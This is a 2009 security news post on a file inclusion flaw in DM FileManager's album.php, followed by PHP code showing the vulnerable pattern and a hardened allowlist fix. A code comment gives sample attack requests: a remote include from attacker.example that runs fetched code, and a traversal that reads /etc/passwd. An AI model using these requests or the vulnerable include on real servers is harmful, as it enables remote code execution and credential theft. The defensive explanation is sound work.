News
Contributed by: Lauren Gerber
Date: June 30, 2009
It would be great if I had psychic powers and could stop a vulnerability dead in its tracks before it crept up on us and made the news headlines. Unfortunately I don't, so I am here once again to tell you about a computer security vulnerability. This time the vulnerability has been reported in DM FileManager, and its consequences could be serious.

DM FileManager is the Dutchmonkey file management system. It lets users manage, upload, change, share and use photos, videos and files online with ease, and is an online file management system geared towards your web site. It is compatible with the majority of operating systems, including Windows 2000. (Some of the files on a Windows 2000 system include, but are not limited to, clbcatq.dll, 15_16wdm.sys, 3cisaadi.sys, a1base.sys, bhp001.dll and c_eucdb.dll.)

The vulnerability lies in the handling of the "SECURITY_FILE" parameter in dm-albums/template/album.php. The value is not properly verified before it is used to include a file, so a malicious user can make the script include an arbitrary file, from either a local path or an external (remote) resource, and any PHP code that file contains is executed by the web server. Exploitation requires that "register_globals" is enabled in PHP: the script does not set the variable itself, and with register_globals on, a request parameter of the same name is turned into that variable before the include runs.

Which versions of DM FileManager does this vulnerability affect? It has been confirmed in version 3.9.4, and all users should be aware that other versions may well be affected too.

What is the solution? Users need to edit the source code so that the input is properly validated before it is used in the include. It has also been suggested that, alongside editing the source code, "register_globals" should be disabled in php.ini. Note that disabling register_globals removes the precondition this particular exploit relies on, but it does not by itself fix the missing validation; both steps are needed.

I would like to quote in conclusion: "In theory, one can build provably secure systems. In theory, theory can be applied to practice but in practice, it can't." - M. Dacier, Eurecom Institute
A further impact of this vulnerability: because the included file is executed as PHP on the server, a successful attacker gains access to the system without the authorization that would normally be required.
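To make the include pattern described above concrete, here is an added example; it is not DM FileManager's own code, and the function names, the template/ directory layout, the allowlist and the file names in it are assumptions. The first part is a hypothetical reconstruction of the vulnerable pattern (an include driven by a variable the script never sets, so register_globals lets the request supply it); the second part is a hardened version that pins the include to an allowlist under a fixed directory and refuses to run when the dangerous PHP settings are still on.

```php
<?php
// Added example, not DM FileManager's source. File names, directory layout
// and the allowlist below are assumptions chosen to illustrate the pattern.

// ---------------------------------------------------------------------------
// VULNERABLE (hypothetical reconstruction of the pattern in the advisory)
// ---------------------------------------------------------------------------
// A template file like this expects its parent script to have set
// $SECURITY_FILE before including it. Requested directly with
// register_globals=On the variable is unset, so a request such as
//   album.php?SECURITY_FILE=http://attacker.example/shell.txt   (remote)
//   album.php?SECURITY_FILE=../../../../etc/passwd               (local)
// makes PHP create $SECURITY_FILE from the query string and include it.
function vulnerable_template()
{
    global $SECURITY_FILE;
    include($SECURITY_FILE);   // unvalidated request-controlled path: the bug
}

// ---------------------------------------------------------------------------
// HARDENED
// ---------------------------------------------------------------------------
// 1. Refuse to run if the deployment still has the dangerous settings on.
//    This is defence in depth; the code below must not depend on it.
if (ini_get('register_globals') || ini_get('allow_url_include')) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('Insecure PHP configuration: set register_globals=Off and allow_url_include=Off in php.ini');
}

// 2. Never let the request decide which file is included. The template is
//    chosen from a fixed allowlist, and the resolved path is then checked to
//    still lie inside the template directory after ../ and symlinks resolve.
define('DM_TEMPLATE_DIR', dirname(__FILE__) . '/template');   // assumed layout

function resolve_template($name)
{
    $allowed = array('security.php', 'default.php');           // assumed allowlist
    if (!in_array($name, $allowed, true)) {
        return false;                                          // unknown name
    }
    $base = realpath(DM_TEMPLATE_DIR);
    $path = realpath(DM_TEMPLATE_DIR . '/' . $name);
    if ($base === false || $path === false) {
        return false;                                          // missing dir or file
    }
    // Require the "<base>/" prefix so a sibling such as template2/ cannot match.
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

function safe_template($name)
{
    $path = resolve_template($name);
    if ($path === false) {
        header('HTTP/1.0 400 Bad Request');
        exit('Invalid template');
    }
    include($path);
}

// 3. The parent script selects the template with a literal. $_GET, $_POST and
//    $_REQUEST are never consulted for this value, so register_globals is moot.
safe_template('security.php');
```

The allowlist alone already stops both the remote URL and the ../ traversal, because neither string is an exact match; the realpath check is there so that a later change to the allowlist (for example, accepting names from a configuration file) cannot silently reintroduce traversal. On the configuration side, register_globals = Off and allow_url_include = Off belong in php.ini (allow_url_include exists from PHP 5.2.0; on older builds allow_url_fopen = Off is what blocks remote includes), and where you cannot edit php.ini, php_flag register_globals off in .htaccess has the same effect under Apache.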